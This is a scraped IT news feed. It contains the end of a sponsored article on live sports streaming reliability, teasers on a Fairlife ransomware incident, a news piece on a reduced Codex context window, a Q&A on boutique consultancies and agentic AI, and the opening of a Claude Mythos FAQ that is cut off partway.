<h3 class="wp-block-heading"><strong>The hidden chain behind every live event</strong></h3>



<p class="wp-block-paragraph">When a streaming disruption becomes public, people naturally look for a single point of failure: the app, the platform, or the provider.</p>



<p class="wp-block-paragraph">A live event depends on dozens of systems working together, and any one of them can become a problem.</p>



<p class="wp-block-paragraph">And the experience is only as good as the weakest handoff between them.</p>



<p class="wp-block-paragraph">It all starts with the live camera feed moving from the venue to the production studio. This is a real-time stream, not a file download. If you drop even a single packet at the wrong moment, everything down the line breaks, no matter how perfect the rest of your setup is.</p>



<p class="wp-block-paragraph">Remote and cloud-based production workflows have redefined how live sports are produced, enabling broadcasters to operate with greater agility and scale. As production becomes more distributed, success increasingly depends on ensuring every stage of the delivery chain works together seamlessly.</p>



<p class="wp-block-paragraph">Each transition is a potential failure point. Managing them requires visibility that extends across providers, platforms, and networks simultaneously.</p>



<p class="wp-block-paragraph">Behind every live stream, technologies like encoding, transcoding, packaging, rights management, and ad insertion are constantly at work. If any one of them fails, the stream can go down altogether.</p>



<p class="wp-block-paragraph">Global distribution introduces another layer of complexity. Viewers in Asia, Africa, and South America may all be watching the same match, but each stream travels across different networks and infrastructure. That means performance can vary by region, and issues may affect one audience without impacting another. </p>



<p class="wp-block-paragraph">AI is increasingly helping operators detect anomalies in real time, pinpoint affected regions and trigger corrective actions before disruptions become widespread. Combined with point-to-point monitoring, it provides the visibility needed to keep live events running smoothly at global scale.</p>



<p class="wp-block-paragraph">Edge delivery is where the difference between preparation and improvisation becomes most apparent. Bringing content closer to users reduces latency, absorbs local traffic surges, and improves performance in markets with variable connectivity. </p>



<p class="wp-block-paragraph">The value of technology investments such as AI and Edge becomes clearest during the moments when demand is highest.</p>



<p class="wp-block-paragraph">Monitoring is what turns visibility into action. With AI helping analyze telemetry and detect anomalies in real time, operations teams can identify issues sooner and respond before they affect viewers. By the time customers start reporting a problem, the opportunity to prevent it has already passed.</p>



<h3 class="wp-block-heading"><strong>What reliability is actually worth</strong></h3>



<p class="wp-block-paragraph">For most of early broadcast history, audience tolerance provided some buffer. Disruptions happened. People accepted them. There was nowhere else to go, and the story rarely escaped the room.</p>



<p class="wp-block-paragraph">Neither of those things is true now.</p>



<p class="wp-block-paragraph">A streaming failure during a major match becomes public within seconds. Viewers don’t distinguish between a network issue, a processing failure, or a distribution problem; they simply see a service that failed. That single experience can shape the broadcaster’s reputation, credibility and customer loyalty, influencing whether viewers come back for the next event or recommend the service to others.</p>



<p class="wp-block-paragraph">The commercial implications are significant. Global tournaments such as the FIFA World Cup illustrate just how valuable live sports rights have become. Their return depends on reliably reaching the audience that was promised.</p>



<p class="wp-block-paragraph">Advertisers invest in live sport for one reason: to reach a large, engaged audience at the exact moment it matters most. If the stream fails during that window, the opportunity is lost. Those viewers, impressions, and advertising value cannot be recovered once the moment has passed.</p>



<p class="wp-block-paragraph">The same principle increasingly applies outside media. Customers rarely know nor care whether an outage originated in the application, the cloud environment, the network or a third-party dependency. They experience a failure of the brand. In a digital-first economy, reliability has become part of the customer experience itself.</p>



<p class="wp-block-paragraph">For broadcasters and streamers, reliability is no longer just an operational KPI. It directly influences audience trust, advertising revenue, and the long-term value of premium sports rights.</p>



<h3 class="wp-block-heading"><strong>The demands ahead are bigger</strong></h3>



<p class="wp-block-paragraph">AI-assisted production is already changing how live events are created. Broadcasters are using AI to automate highlight generation, camera selection and real-time clip packaging for social media, with new AI-assisted workflows producing sports highlights up to <a href="https://www.statsperform.com/insights/opta-pulse-launch/">80% faster</a> than traditional methods. </p>



<p class="wp-block-paragraph">All of this processing happens within the live delivery chain, where every additional task must be completed without adding latency or compromising the viewing experience.</p>



<p class="wp-block-paragraph">Personalisation at scale is the next significant challenge. Not personalisation in a vague sense, but the specific technical reality of delivering multi-language commentary tracks, different languages, different statistical overlays, and different camera angles to different viewers watching the same event simultaneously. </p>



<p class="wp-block-paragraph">Instead of one stream per event, the infrastructure has to manage a matrix of concurrent variants, each with its own encoding, storage, and delivery requirements. </p>



<p class="wp-block-paragraph">Interactive experiences add bidirectional data flows: real-time polls, integrated second-screen data, live wagering. These move data from the viewer back through infrastructure that was primarily built to push content outward. Managing that at scale is a different engineering problem from managing delivery.</p>



<p class="wp-block-paragraph">Higher-resolution formats (4K now becoming a standard expectation in premium markets, 8K moving into early deployment) are bandwidth-intensive at exactly the scale where bandwidth is already under pressure. Consumer devices are ready. Infrastructure in many high-growth markets is not uniformly there yet.</p>



<p class="wp-block-paragraph">Many of these capabilities are already being deployed for major global sporting events. The organisations investing seriously in technology, innovation, and infrastructure now are building toward a standard that will be the baseline requirement within a few years. Those that are not will be closing the gap under the worst possible conditions.</p>



<h3 class="wp-block-heading"><strong>The technology you never think about</strong></h3>



<p class="wp-block-paragraph">The broadcasters that succeed don’t leave reliability to chance. They plan for it from the outset, designing their infrastructure to handle peak demand long before the audience arrives.</p>



<p class="wp-block-paragraph">This reality hits hardest during massive global events. When a stream glitches, millions of people feel it simultaneously in a matter of seconds. Keeping those streams alive doesn’t happen by accident; it takes massive scale, intense discipline, and deep experience controlling everything from the stadium camera to the viewer’s screen.</p>



<p class="wp-block-paragraph">The lesson extends well beyond live sports. Every enterprise is becoming a real-time digital business, whether it’s delivering AI-powered applications, launching digital products, processing financial transactions, or handling a sudden surge in customer demand. Different industries may face different triggers, but the expectation is the same: the experience has to work, even when demand is at its highest.</p>



<p class="wp-block-paragraph">Delivering that level of reliability is why many of the world’s largest sports brands rely on <a href="https://www.tatacommunications.com/media-entertainment">Tata Communications</a>. Supporting the broadcast, production, and management of 80% of the world’s sporting events, and reaching more than two billion viewers across 190+ countries, Tata Communications operates in the invisible layers that make every live moment possible. We call this the “Virtual Stadium of the World”, the technology and infrastructure that connects fans, broadcasters, rights-holders, and sporting moments at a truly global scale.</p>



<p class="wp-block-paragraph">By managing the critical handoffs across contribution networks, edge processing, and global media infrastructure, we engineer the resilience required to keep 120,000 live events running flawlessly every year.</p>



<p class="wp-block-paragraph">Live sport may be the most visible test of digital infrastructure, but it won’t be the last. As AI, personalisation and real-time experiences become the norm across industries, the ability to deliver reliably at scale will define far more than match day.</p>



<p class="wp-block-paragraph">To learn more, visit us <a href="https://www.tatacommunications.com/sports?utm_source=blog&amp;utm_medium=cio&amp;utm_campaign=mes%20fifa%20campaign">here</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware in the Dairy Aisle: A Look at Fairlife’s Cyberattack]]></title>
<description><![CDATA[Operational Impact and Response The Coca-Cola Company revealed a cyber incident impacting its Fairlife dairy business on July 16, 2026. The disruption forced an immediate nationwide pause on U.S. processing...
The post Ransomware in the Dairy Aisle: A Look at Fairlife’s Cyberattack appeared first...]]></description>
<link>https://tsecurity.de/de/3681387/it-security-nachrichten/ransomware-in-the-dairy-aisle-a-look-at-fairlifes-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681387/it-security-nachrichten/ransomware-in-the-dairy-aisle-a-look-at-fairlifes-cyberattack/</guid>
<pubDate>Mon, 20 Jul 2026 16:24:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1024" height="768" src="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Ransomware-in-the-Dairy-Aisle-A-Look-at-Fairlifes-Cyberattack.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Ransomware-in-the-Dairy-Aisle-A-Look-at-Fairlifes-Cyberattack.png 1024w, https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Ransomware-in-the-Dairy-Aisle-A-Look-at-Fairlifes-Cyberattack-768x576.png 768w" sizes="(max-width: 1024px) 100vw, 1024px"><p>Operational Impact and Response The Coca-Cola Company revealed a cyber incident impacting its Fairlife dairy business on July 16, 2026. The disruption forced an immediate nationwide pause on U.S. processing...</p>
<p>The post <a href="https://www.cyberdefensemagazine.com/ransomware-in-the-dairy-aisle/" data-wpel-link="internal">Ransomware in the Dairy Aisle: A Look at Fairlife’s Cyberattack</a> appeared first on <a href="https://www.cyberdefensemagazine.com/" data-wpel-link="internal">Cyber Defense Magazine</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware in the Dairy Aisle: A Look at Fairlife’s Cyberattack]]></title>
<description><![CDATA[Operational Impact and Response The Coca-Cola Company revealed a cyber incident impacting its Fairlife dairy business on July 16, 2026. The disruption forced an immediate nationwide pause on U.S. processing… The post Ransomware in the Dairy Aisle: A Look at…
Read more →
The post Ransomware in the...]]></description>
<link>https://tsecurity.de/de/3681377/it-security-nachrichten/ransomware-in-the-dairy-aisle-a-look-at-fairlifes-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681377/it-security-nachrichten/ransomware-in-the-dairy-aisle-a-look-at-fairlifes-cyberattack/</guid>
<pubDate>Mon, 20 Jul 2026 16:24:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Operational Impact and Response The Coca-Cola Company revealed a cyber incident impacting its Fairlife dairy business on July 16, 2026. The disruption forced an immediate nationwide pause on U.S. processing… The post Ransomware in the Dairy Aisle: A Look at…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ransomware-in-the-dairy-aisle-a-look-at-fairlifes-cyberattack/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ransomware-in-the-dairy-aisle-a-look-at-fairlifes-cyberattack/">Ransomware in the Dairy Aisle: A Look at Fairlife’s Cyberattack</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI’s Codex context reduction for GPT 5.6 sparks dissatisfaction among developers]]></title>
<description><![CDATA[OpenAI’s recent update to its Codex coding agent has developers worrying over the impact of the change on large code repositories and long-running AI-assisted sessions.



The update to the Codex CLI reduces the default configured input context window for GPT-5.6 to 272,000 tokens from 372,000 to...]]></description>
<link>https://tsecurity.de/de/3681246/ai-nachrichten/openais-codex-context-reduction-for-gpt-56-sparks-dissatisfaction-among-developers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681246/ai-nachrichten/openais-codex-context-reduction-for-gpt-56-sparks-dissatisfaction-among-developers/</guid>
<pubDate>Mon, 20 Jul 2026 15:19:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI’s recent update to its Codex coding agent has developers worrying over the impact of the change on large code repositories and long-running AI-assisted sessions.</p>



<p class="wp-block-paragraph">The <a href="https://github.com/openai/codex/pull/34009" target="_blank" rel="noreferrer noopener">update to the Codex CLI</a> reduces the default configured input context window for GPT-5.6 to 272,000 tokens from 372,000 tokens.</p>



<p class="wp-block-paragraph">In practice, the update means the coding agent will retain a smaller amount of code, conversation history, and other session information before compacting older context to make room for new information, a change that has prompted criticism from some developers on <a href="https://www.reddit.com/r/codex/comments/1v02y73/gpt56_context_reduced_to_272k/" target="_blank" rel="noreferrer noopener">Reddit</a> and <a href="https://x.com/Codex_Changelog/status/2079018788876411322" target="_blank" rel="noreferrer noopener">X</a> over the reduced token window.</p>



<p class="wp-block-paragraph">While OpenAI has not publicly explained the rationale behind the update, several developers took to social media to question why OpenAI reduced the default context configuration, with some arguing that the change could make Codex less effective on long-running coding sessions by triggering context compaction sooner.</p>



<p class="wp-block-paragraph">Others expressed concern that the smaller window could require more frequent context management or session resets, although some noted that the practical impact would depend on project size and how developers structure their workflows.</p>



<h2 class="wp-block-heading">Smaller context, bigger workflow implications</h2>



<p class="wp-block-paragraph">The context window reduction could affect developer productivity and the adoption of autonomous agents in enterprise workflows, analysts say.</p>



<p class="wp-block-paragraph">“While the context reduction in Codex is unlikely to affect routine coding tasks such as bug fixes or changes involving a few files, it could impact large codebases, repository-wide refactoring, and long-running sessions,” said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<p class="wp-block-paragraph">“Less memory per session means the AI agent forgets earlier parts of a long coding session sooner. The agent may need to summarize or reload context more often, increasing repeated searches, occasional loss of earlier decisions and the need for developers to re-establish context,” Jain added.</p>



<p class="wp-block-paragraph">That need for manual context management, according to <a href="https://www.linkedin.com/in/muskan-bandta2004/" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at FinOps services providing firm ZopDev, goes completely against the “whole appeal” of Codex-like tools that promised improved productivity out-of-the-box: “A lot of developers are saying their sessions now spend more time on compacting than actually working.”</p>



<p class="wp-block-paragraph">“While context reduction may not further inflate bills, it shows up as more retries, more compaction, and your engineers spending more time babysitting the thing. The spend just moves from the invoice onto your team’s time.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika, said that the context reduction will force development teams to choose between two options: either accept that the agent is reasoning with an incomplete picture of the required context or learn to manage a new design constraint around context compaction.</p>



<p class="wp-block-paragraph">Development teams, Jena said, will need to design workflows that proactively manage context: by breaking work into smaller tasks, relying more on retrieval mechanisms, and monitoring context consumption.</p>



<p class="wp-block-paragraph">That forced design constraint on engineering, echoed Bandta, will slow the enterprise adoption of agent-driven workflows: “Context is the agent’s working memory, so cutting it by a third changes what you can trust it to do at all.”</p>



<h2 class="wp-block-heading">Build for changing AI platforms, not fixed limits?</h2>



<p class="wp-block-paragraph">More broadly, analysts pointed out that the episode is a reminder that enterprises should avoid tightly coupling software development workflows to the current operational characteristics of managed AI coding platforms, as context limits, pricing, runtime behavior, and model availability are all likely to evolve with little or no advance notice.</p>



<p class="wp-block-paragraph">“Enterprises should avoid depending on any single context window, continuously benchmark AI coding tools on real workloads, and build workflows around retrieval, modular design, and agent orchestration so they remain resilient as models evolve,” Jain said.</p>



<p class="wp-block-paragraph">Kanerika’s Jena echoed that view: “The right approach is to build AI-assisted development pipelines that degrade gracefully when operational parameters shift: instrument your context consumption, don’t hard-code context budgets, and treat the vendor’s current specifications as a starting point, not a contract.” Similarly, Bandta advised enterprises to treat managed AI coding platforms like any other critical software dependency: “Don’t build anything that only works right at the edge of a limit, and keep enough flexibility that you’re not stuck if one vendor changes the deal.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Why boutique consultancies might be better for AI rollouts than the bigwigs]]></title>
<description><![CDATA[Major AI labs are unleashing forward-deployed engineers (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.



But smaller firms are in the mix now, as well. AI is helping 28Stone Con...]]></description>
<link>https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</guid>
<pubDate>Mon, 20 Jul 2026 13:33:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Major AI labs are <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">unleashing forward-deployed engineers</a> (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.</p>



<p class="wp-block-paragraph">But smaller firms are in the mix now, as well. AI is helping <a href="https://www.28stone.com/" target="_blank" rel="noreferrer noopener">28Stone Consulting</a>, a New York-based, 230-person technology consultancy for capital markets, punch above its weight against larger rivals in the <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html">rush to deliver FDEs</a>.</p>



<p class="wp-block-paragraph">In this Q&amp;A, <a href="https://www.linkedin.com/in/thomas-dolan-4124914" target="_blank" rel="noreferrer noopener">Thomas Dolan</a> and <a href="https://www.linkedin.com/in/frank-erickson-07675a1" target="_blank" rel="noreferrer noopener">Frank Erickson</a>, founders of 28Stone, argue that agentic AI isn’t a one-size-fits-all solution in vertical markets; success takes discipline, deep domain expertise, and human involvement to mitigate risk.</p>



<p class="wp-block-paragraph">Many enterprises continue to struggle with the use of AI agents, which is consultancies are stepping in to get projects off the ground. 28Stone is among those that have published blueprints and methodologies on the development and delivery of agentic AI workflows with humans in the loop.</p>



<p class="wp-block-paragraph"><em>Computerworld</em> spoke with both founding partners about why companies are still stumbling with <a href="https://www.computerworld.com/article/4083589/from-chatbots-to-colleagues-how-agentic-ai-is-redefining-enterprise-automation.html">agentic AI rollouts</a>, and what a disciplined delivery process actually looks like.</p>



<p class="wp-block-paragraph"><strong>After 15 years of delivering software for capital markets firms, is ‘AI-first’ a real distinction or just positioning?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re not shying away from being AI-forward. What needs to shine through is AI done intelligently — not stuff you get by buying some tokens for somebody on the trading desk. We’re an AI-first firm.”</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And it’s temporary. At some point, AI is going to be synonymous with software development.</p>



<p class="wp-block-paragraph">“The whole idea of an AI SDLC (software development lifecycle) versus an SDLC is going to be one and the same, a lot like cloud computing today. To not include AI in your strategy, you’d look like a COBOL vendor.”</p>



<p class="wp-block-paragraph"><strong>What does agentic AI delivery look like?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’ve got several AI initiatives delivering a pure agentic approach. We’ve doubled down on the human expertise wrapper in the SDLC. That doesn’t mean sacrificing any of the benefits of the AI models — quite the opposite.</p>



<p class="wp-block-paragraph">“You don’t achieve anywhere near the same level of value from applying AI without keeping that expertise — industry, functional and technical — throughout the process.”</p>



<p class="wp-block-paragraph"><strong>Where do humans stay in the loop once agents are doing the work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re believers in starting with requirements discovery. Someone who knows the analytical nuances of a good business analyst is critically important; shaping a product owner’s business information through a markup file that can be fed into a BA agent, then treating the output as if it came from a very fast junior BA. Only then is the story complete.</p>



<p class="wp-block-paragraph">“The developer takes that story, transforms it into the most efficient input, then owns the output, because they’re accountable for that code. A developer should own the code on both the input and output side.</p>



<p class="wp-block-paragraph">“Your product owner, who knows the business, that’s great. But expecting them to interact with an agent and output enterprise code is ridiculous. It’s not a great plan.“</p>



<p class="wp-block-paragraph"><strong>Why not just put one do-everything person in charge of AI and agents?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “Every analyst, programmer or software engineer isn’t a great requirements analyst. And a great domain analyst with some technical background won’t know if the agent’s code is garbage, maintainable, performant.</p>



<p class="wp-block-paragraph">“It’s unrealistic to expect one individual to have that breadth across domain, software engineering, testing, deployment. Clients ask all the time, and we push back: ‘Great, if you can find that guy, they’re few and far between.’ To deliver at the enterprise level, you need the human expertise, at depth.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “There’s system speed and latency, important in parts of finance. Then there’s speed of delivery, because other areas evolve quickly and time-to-market is critical.</p>



<p class="wp-block-paragraph">“Our human wrapper may at first pass come across as a little slowed down. Maybe it is. But [Erickson] has a good analogy about one of the dangers of AI: you can end up going really fast in the wrong direction. By the time you look up, you’re way off base and have to backtrack.“</p>



<p class="wp-block-paragraph"><strong>What about AI in your sector do you think is overhyped?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “The hype around the ease of use of AI and the democratization of enterprise software delivery — that ‘anybody could do it now, it’s all being done by machines’ — is another idea that could prove costly in the long run.</p>



<p class="wp-block-paragraph">“This do-it-yourself reaction is dangerous for clients, and for trust in the overall AI benefit, which is real. We compare it to the beginning of offshoring 20, 30 years ago: a golden idea that was going to cure everything. A lot of firms did it thoughtlessly, thinking it’s just labor arbitrage, and it almost inevitably failed. That all-or-nothing mentality missed that offshoring is an amazing way of getting better value for your dollar, but it has to be done thoughtfully, so the delivery process — the thing that ties it all together — stays unsevered.</p>



<p class="wp-block-paragraph">“We’re seeing that now. I’ve heard, ‘We’ll just push a button, the machine’s building the system.’ The machine is not building the system. It might be writing the code, the story, running the tests.</p>



<p class="wp-block-paragraph">The system is built by a team of engineers you bring in and trust. My fear is that people will say, ‘We don’t need this vendor or this technology team. I’ve got a product team. They might not be able to code at all, but they know the business,’ and it fails dramatically. </p>



<p class="wp-block-paragraph">“Then people say, ‘We played with AI, it’s not ready yet,’ and throw it all away. One of the best things we can do is ensure clients know the benefit is real.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “The hype can be summed up in a single phrase: <a href="https://www.computerworld.com/article/4022711/when-everything-is-vibing.html">vibe coding</a>. That has done AI a massive disservice, because there’s a huge difference between vibe coding and enterprise software development, and some of the loudest proponents of AI are too latched on to it. In our industry, the only way to succeed would be a stable of unicorns. It just doesn’t scale. I get perturbed when our people internally refer to AI tooling as vibe coding; if they think that’s what they’re doing, they’re misunderstood.“</p>



<p class="wp-block-paragraph"><strong>When you engage clients at different levels of AI maturity, how do you get them to a understand what works?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “95% of our take on an agentic approach is in line with everyone else’s, but that 5% matters, especially in requirements discovery, in who’s giving the requirements and how they’re thought of. It can set you up for dramatic errors, given the speed at which you’re moving.</p>



<p class="wp-block-paragraph">“There’s a dangerous human tendency we’re seeing among clients to try and cut corners at the start of a project and — in lieu of having deep, expert driven discovery sessions — just summarize what they may want using AI.</p>



<p class="wp-block-paragraph">“We would hope our clients are collaborative, everyone understanding it’s early days. If a client insists on doing something we feel strongly against, like a product owner completely owning everything right up to code generation, that’s an issue we have to either push back strongly on or step out of the accountability for.“</p>



<p class="wp-block-paragraph"><strong>AI body shops — LLM providers and giant consultancies — are emerging to help enterprises deploy AI. Does that model work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Whether you’re partnering with an LLM or with an AI-first, generic software provider — ‘Hey, we’re not industry guys, but we know AI delivery’ — you end up, if you’re a bank or a broker-dealer, saying: ‘All right, we know our business, these guys know the AI side of it. What could go wrong? Put us together and we’ll have quality engineering.’</p>



<p class="wp-block-paragraph">“The problem is what you miss: the know-how of putting industry and technical expertise together and actually delivering financial services systems. The people working at the generic delivery firms, whether an AI-only firm or a body shop somewhere, don’t have that capability.“</p>



<p class="wp-block-paragraph"><strong>Does AI change the economics for smaller consultancies like yours competing against the big firms, and does it cut both ways?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Over our 15 years pre-AI, there were two recurring reasons we’d lose a project. One: ‘We’d love to work with you guys, given your subject matter expertise, but the costs just aren’t there compared to my budgets. I’m being forced to go to a body shop or an [offshore] delivery center.’ The other side of that coin: ‘We love your capabilities, but you’re a firm of 230 people and I need 300, 400 people.’</p>



<p class="wp-block-paragraph">“AI changes the options for clients. You don’t have to sacrifice the niche vendor who knows your space just because you need a larger team or a cost target. AI levels the playing field and should allow smaller firms to compete with the larger, big-box generic firms, the Accentures of the world.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “It redefines what scale means. You can look at velocity as a measure of your cost to deliver, not a rate card. Scale can’t be defined in terms of headcount anymore. It’s got to be defined in terms of output.</p>



<p class="wp-block-paragraph">“There’s a threat in it, too. If you’re an Accenture with hundreds of thousands of low-cost software engineers, how do you train all those people? I feel for them. But for us, a couple hundred people with a specific domain focus, it’s a huge opportunity.“</p>



<p class="wp-block-paragraph"><strong>How has the profile of the people you and others hire changed with this agentic process?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “You’re still looking for people with strong engineering and design backgrounds, and communication skills, because they interact across the software development lifecycle more than in the past.</p>



<p class="wp-block-paragraph">“Many take too much joy in typing out perfect code. Sorry, I don’t need you writing for-loops and classes anymore. I need you reviewing them, understanding them, operating at a higher level. That’s a different kind of person: an engineer, not a programmer or a coder. On the [business analyst] side it’s similar: people took great pride in detailed user stories covering every path. Now it’s conversations, prompts, reviewing output — less doing, more interacting.</p>



<p class="wp-block-paragraph">“More than ever, they have to be interested in the domain. They can’t just be, ‘I want to learn everything there is to know about Java.’ That’s too narrow. They don’t have to be an expert; they have to be interested. In our case, capital markets is a specific niche. The biggest challenge is getting familiar with the tools — finding time, while delivering for customers, to ramp up and make the mistakes you need to without jeopardizing projects.“</p>



<p class="wp-block-paragraph"><strong>What about governance? Who’s keeping AI delivery and its costs under control?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “This is evolving rapidly. People aren’t sure how to put governance around this. The most obvious is financial governance. People are starting to get hefty bills. One of our clients spent a million dollars on tokens over the last eight weeks alone. Sticker shock. The token-maxing policies are starting to show their flaws. It’s wild west still: learn on the fly, then figure out what needs to be governed.“</p>



<p class="wp-block-paragraph"><strong>Are CIOs actually opening their wallets? And when they do, what’s the smarter way to invest?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “There’s still a lot of caution. Forecasts keep going down on how long something should take. So: ‘I could wait three months and maybe still get it delivered by the same date someone’s promising me now, but for half the price. I’m going to wait and see when equilibrium is met.’ We haven’t seen the wallets open up like crazy — it’s slow adoption.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “One of our clients is looking at it from a productivity-boost perspective: instead of doing the same for less, I can do much more for the same. AI lets clients pull the trigger on things they wouldn’t have in the past — projects that might not have been approved pre-AI, where the costs have come down to a point that’s palatable with the business.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And that’s the story we’re hoping to hear more of. There isn’t a huge cost anymore to exploring a business opportunity. The time and money that would have gone to a return-on-investment study could be spent on a proof-of-concept with AI, and the project done a few weeks later. Maybe [there’s] a hint of things to come, where decisions start being made quicker. </p>



<p class="wp-block-paragraph">“There’s a little fear on our side, though: a lot of tiny little projects is tough for a consulting business.“</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Mythos FAQ: Capabilities, access, competitors, implications]]></title>
<description><![CDATA[1.
What is Claude Mythos?




Claude Mythos is an advanced AI model developed by Anthropic and is optimized for cybersecurity and healthcare applications.



Mythos 5 was originally released in April to a small group of vetted technology partners ahead of a planned wider rollout.



Anthropic est...]]></description>
<link>https://tsecurity.de/de/3680433/it-security-nachrichten/claude-mythos-faq-capabilities-access-competitors-implications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680433/it-security-nachrichten/claude-mythos-faq-capabilities-access-competitors-implications/</guid>
<pubDate>Mon, 20 Jul 2026 08:38:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="wp-block-idg-base-theme-faq-block faq-block">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h2 class="wp-block-heading">What is Claude Mythos?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p class="wp-block-paragraph">Claude Mythos is an advanced AI model developed by Anthropic and is optimized for cybersecurity and healthcare applications.</p>



<p class="wp-block-paragraph"><a href="https://www.anthropic.com/claude/mythos">Mythos 5</a> was originally released in April to a small group of vetted technology partners ahead of a planned wider rollout.</p>



<p class="wp-block-paragraph">Anthropic established <strong>Project Glasswing</strong>, a consortium that gives limited, controlled access to Mythos to infrastructure providers, open-source developers, and major technology companies. The scheme was designed to enable defenders to find and resolve vulnerabilities faster than they could be identified by attackers, <a href="https://www.csoonline.com/article/4154222/6-ways-attackers-abuse-ai-services-to-hack-your-business.html">many of which are also beginning to rely heavily on AI tools</a>.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h2 class="wp-block-heading">What are the capabilities of Claude Mythos?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p class="wp-block-paragraph">The <a href="https://www.csoonline.com/article/4155342/what-anthropic-glasswing-reveals-about-the-future-of-vulnerability-discovery.html">50 initial partners of Project Glasswing</a> were able to use Mythos to find more than <a href="https://www.csoonline.com/article/4176865/project-glasswing-has-uncovered-10000-vulnerabilities-anthropic.html">10,000 high- or critical-severity vulnerabilities</a> in every major operating system and <a href="https://www.csoonline.com/article/4162259/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox.html">every major web browser</a>.</p>



<p class="wp-block-paragraph">The model is identifying security flaws that had evaded even the most capable security researchers for years, such as a <a href="https://www.csoonline.com/article/4159617/behind-the-mythos-hype-glasswing-has-just-one-confirmed-cve.html">27-year-old bug in OpenBSD</a>. It has also proved capable of chaining multiple vulnerabilities together.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h2 class="wp-block-heading">How is Anthropic restricting access to Claude Mythos?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
